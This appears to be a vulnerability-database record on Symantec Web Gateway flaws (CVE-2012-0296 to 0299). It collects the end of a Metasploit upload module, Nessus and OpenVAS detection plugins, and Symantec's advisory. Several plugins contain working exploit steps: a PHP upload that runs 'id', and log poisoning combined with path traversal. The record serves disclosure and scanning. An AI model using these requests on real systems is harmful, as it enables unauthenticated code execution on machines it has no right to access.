\n'uri' => \"#{uri}spywall/blocked_file.php\", \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'data' => post_data.to_s \n}) \n \n# If the server returns 200 and the body contains the name \n# of the default file, we assume we uploaded the malicious \n# file successfully \nif not res or res.code != 200 or res.body !~ /temp.php/ \nprint_error(\"#{peer} - File wasn't uploaded, aborting!\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}spywall/images/upload/temp/temp.php\" \n}) \n \n# If we don't get a 200 when we request our malicious payload, we suspect \n# we don't have a shell, either. Print the status code for debugging purposes. \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returned #{res.code.to_s}\") \nend \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113486/symantec_web_gateway_file_upload.rb.txt"}], "nessus": [{"lastseen": "2021-01-20T15:18:26", "description": "The remote web server is hosting a version of Symantec Web Gateway\nwith a code execution vulnerability. The upload_file() function of\nutil_functions.php allows PHP files to be uploaded to a directory where\nthe web server can execute them. This function is used by multiple PHP\nscripts that can be requested without authentication. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code.\nAchieving root command execution is trivial.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2012-05-21T00:00:00", "title": "Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0299"], "modified": "2012-05-21T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_UPLOAD_FILE_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/59210", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(59210);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0299\");\n script_bugtraq_id(53443);\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n\n script_name(english:\"Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)\");\n script_summary(english:\"Tries to upload & request a PHP file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nwith a code execution vulnerability. The upload_file() function of\nutil_functions.php allows PHP files to be uploaded to a directory where\nthe web server can execute them. This function is used by multiple PHP\nscripts that can be requested without authentication. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code.\nAchieving root command execution is trivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-091/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523065/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\nboundary = '----nessus';\nurl = install['dir'] + '/blocked_file.php';\nnow = unixtime();\nphp = '<?php print_r(\"' + now + '\\\\n\"); system(\"id\"); ?>';\npostdata = '--' + boundary + '\\r\nContent-Disposition: form-data; name=\"submitted\"\\r\n\\r\n1\\r\n--' + boundary + '\\r\nContent-Disposition: form-data; name=\"new_image\"; filename=\"payload.php\"\\r\nContent-Type: text/plain\\r\n\\r\n' + php + '\\r\n\\r\n--' + boundary + '--\\r\\n';\nres = http_send_recv3(\n method:'POST',\n port:port,\n item:url,\n content_type:'multipart/form-data; boundary=' + boundary,\n data:postdata,\n exit_on_fail:TRUE\n);\nscript_creation = http_last_sent_request();\n\nurl = install['dir'] + '/images/upload/temp/temp.php';\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif(now >!< res[2] || !egrep(pattern:'uid=[0-9]+.*gid=[0-9]+.*', string:res[2]))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:install['dir'], port:port));\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus uploaded a PHP file by sending the following request :\\n\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n chomp(script_creation) + '\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n '\\nThis file executes the \"id\" command and is located at :\\n\\n' +\n build_url(qs:url, port:port) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nRequesting this file returned the following output :\\n\\n' + \n data_protection::sanitize_uid(output:chomp(res[2])) + '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:18:26", "description": "According to its self-reported version number, the remote web server\nis hosting Symantec Web Gateway before version 5.0.3, which has the\nfollowing vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion\n vulnerabilities exist that could lead to arbitrary code\n execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary\n files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to\n arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution\nvulnerabilities to execute commands as the apache user. After\nexploitation, obtaining a root shell is trivial.", "edition": 26, "published": "2012-05-21T00:00:00", "title": "Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0298", "CVE-2012-0297", "CVE-2012-0299", "CVE-2012-0296"], "modified": "2012-05-21T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_SYM12-006.NASL", "href": "https://www.tenable.com/plugins/nessus/59209", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(59209);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2012-0296\",\n \"CVE-2012-0297\",\n \"CVE-2012-0298\",\n \"CVE-2012-0299\"\n );\n script_bugtraq_id(\n 53396,\n 53442,\n 53443,\n 53444\n );\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n script_xref(name:\"EDB-ID\", value:\"18832\");\n script_xref(name:\"EDB-ID\", value:\"18932\");\n script_xref(name:\"EDB-ID\", value:\"18942\");\n script_xref(name:\"EDB-ID\", value:\"19065\");\n script_xref(name:\"EDB-ID\", value:\"19406\");\n\n script_name(english:\"Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)\");\n script_summary(english:\"Checks SWG version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote web server\nis hosting Symantec Web Gateway before version 5.0.3, which has the\nfollowing vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion\n vulnerabilities exist that could lead to arbitrary code\n execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary\n files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to\n arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution\nvulnerabilities to execute commands as the apache user. After\nexploitation, obtaining a root shell is trivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-090/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-091/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523064/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523065/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"audit.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nver = install['ver'];\nfix = '5.0.3';\n\nurl = build_url(port:port, qs:dir);\n\nif (ver == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, 'Symantec Web Gateway', url);\n\nif (ver =~ '^5' && ver_compare(ver:ver, fix:fix, strict:FALSE) < 0)\n{\n set_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', url, ver);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-12T17:30:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "description": "This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2012-06-01T00:00:00", "id": "OPENVAS:1361412562310802632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802632", "type": "openvas", "title": "Symantec Web Gateway Remote Shell Command Execution Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway Remote Shell Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802632\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(53444, 53443);\n script_cve_id(\"CVE-2012-0297\", \"CVE-2012-0299\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-01 12:12:12 +0530 (Fri, 01 Jun 2012)\");\n script_name(\"Symantec Web Gateway Remote Shell Command Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"symantec_web_gateway/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49216\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/18932\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will result in the execution of arbitrary attack supplied\n commands in the context of the affected application.\");\n\n script_tag(name:\"affected\", value:\"Symantec Web Gateway versions 5.0.x before 5.0.3\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of certain unspecified\n input. This can be exploited to execute arbitrary code by injecting crafted\n data or including crafted data.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(dir == \"/\") dir = \"\";\nexploit= 'GET ' + dir + '/<?php phpinfo();?> HTTP/1.1\\r\\n\\r\\n';\nres = http_send_recv(port:port, data:exploit);\n\nurl = dir + \"/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log\";\nreq = http_get(item:url, port:port);\nres = http_send_recv(port:port, data:req);\n\nif(res && res =~ \"^HTTP/1\\.[01] 200\" && \"<title>phpinfo()\" >< res && \"<title>Symantec Web Gateway\" >< res){\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2020-12-24T10:42:26", "bulletinFamily": "software", "cvelist": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"], "description": "### SUMMARY\n\n \n\nSymantec&#x27;s Web Gateway management GUI is susceptible to file include command injection/execution, file upload/execution and file download/deletion security issues. The management GUI is also susceptible to cross-site scripting (XSS). Successful exploitation could result in execution of arbitrary code in the context of the application, denial of service through deletion of arbitrary system files, and unauthorized access to users' data or to unauthorized network information.\n\n### AFFECTED PRODUCTS\n\n \n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**Solution** \n \n---|---|--- \n \nSymantec Web Gateway\n\n| \n\n5.0.x\n\n| \n\nSymantec Web Gateway 5.0.3 \n \n### ISSUES\n\n \n\n**CVSS2**\n\n**Base Score**\n\n| \n\n**Impact**\n\n| \n\n**Exploitability**\n\n| \n\n**CVSS2 Vector** \n \n---|---|---|--- \n \n**Command injection code execution - High** \n \n8.33\n\n| \n\n**10.0**\n\n| \n\n**6.45**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:C\n\n \n \n**File include/command execution - High** \n \n7.77\n\n| \n\n**9.2**\n\n| \n\n**4.65**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:N\n\n \n \n**File download/deletion- Medium** \n \n6.1\n\n| \n\n**6.9**\n\n| \n\n**6.5**\n\n| \n\nAV:A/AC:L/Au:N/C:N/I:N/A:C \n \n**Cross-site scripting - Medium** \n \n4.33\n\n| \n\n**4.93**\n\n| \n\n**5.54**\n\n| \n\nAV:A/AC:M/Au:N/C:P/I:P/A:N \n \n \n\nBID 53444 to the file include/command execution issues\n\nBID 53442 to the file download/deletion issues\n\nBID 53443 to the file upload/OS command execution issue\n\nBID 53396 to the XSS issues\n\nCVE-2012-0297 to the file include/command execution issues\n\nCVE-2012-0298 to the file download/deletion issues\n\nCVE-2012-0299 to the file upload/OS command execution issues\n\nCVE-2012-0296 to the XSS issues\n\n### MITIGATION\n\n \n\n**Details**\n\nSymantec was notified of multiple security issues impacting the management console of the Symantec Web Gateway Appliance. The management interface does not properly authenticate or filter external input. This could allow unauthorized access to user&#x27;s session or network information. As a result of weak authentication and sanitization of user controlled input, arbitrary code could potentially be injected/included in application scripts used by the Symantec Web Gateway application potentially resulting in arbitrary command execution with application privileges. \n\nAdditionally, file management scripts in the Symantec Web Gateway interface do not properly filter user input, potentially resulting in an unauthenticated, unprivileged user downloading and deleting arbitrary files including essential operational files. This could render the targeted system unavailable or unusable depending on the success of such an attempt and files targeted. An unauthenticated, unprivileged user could also upload arbitrary code through the abuse of management scripts. A malicious user could be able to control the file name and location which could potentially result in arbitrary command execution with elevated privileges.\n\nCross-site scripting vulnerabilities were also reported in the Symantec Web Gateway Management Interface. Cross-site scripting is a trust exploitation generally requiring enticing a authenticated user to click on a malicious link. A successful exploitation, depending on the nature of the link, could potentially result in arbitrary java/html requests and scripts executed in the context of the targeted user.\n\nIn a normal installation, the Symantec Web Gateway management interface should not be accessible external to the network. However, an authorized but unprivileged network user or an external attacker able to leverage network access could attempt to exploit these weaknesses. \n\n \n\n**Symantec Response**\n\nSymantec engineers verified these issues and have released an update to address them. Symantec engineers reviewed related functionality to further enhance the overall security of Symantec Web Gateway. Symantec has released Symantec Web Gateway 5.0.3, currently available to customers through normal update channels.\n\nSymantec is not aware of any exploitation of, or adverse customer impact from these issues.\n\n \n**Best Practices**\n\nAs part of normal best practices, Symantec strongly recommends:\n\n * Restrict access to administration or management systems to privileged users.\n * Disable remote access or restrict it to trusted/authorized systems only.\n * Keep all operating systems and applications updated with the latest vendor patches.\n * Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats.\n * Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities\n\n### ACKNOWLEDGEMENTS\n\n \n\nSymantec credits Tenable Network Security working through TippingPoint&#x27;s [ZeroDay Initiative](<http://www.zerodayinitiative.com/>) for reporting file include, command injection/execution and file download/deletion and upload/execution issues.\n\n \n\nSymantec credits an anonymous contributor working with Beyond Security's SecuriTeam Secure Disclosure project ([http://www.beyondsecurity.com/ssd.html](<http://www.beyondsecurity.com/ssd.html>) for reporting file include, command injection/execution; file download/deletion and upload/execution issues.\n\n \n\nSymantec credits Ajay Pal Singh Atwal and an anonymous finder for reporting the cross-site scripting issues.\n\n### REFERENCES\n\n \n\n**BID:** Security Focus, [http://www.securityfocus.com](<http://www.securityfocus.com/>), has assigned the following Bugtraq IDs (BID) to these issues for inclusion in the Security Focus vulnerability database.\n\n**CVE:** These issues are candidates for inclusion in the CVE list ([http://cve.mitre.org](<http://cve.mitre.org/>)), which standardizes names for security problems. The following CVE IDs have been assigned.\n", "modified": "2020-03-05T20:47:00", "published": "2012-05-17T08:00:00", "id": "SMNTC-1250", "href": "", "type": "symantec", "title": "Symantec Web Gateway Multiple Security Issues", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}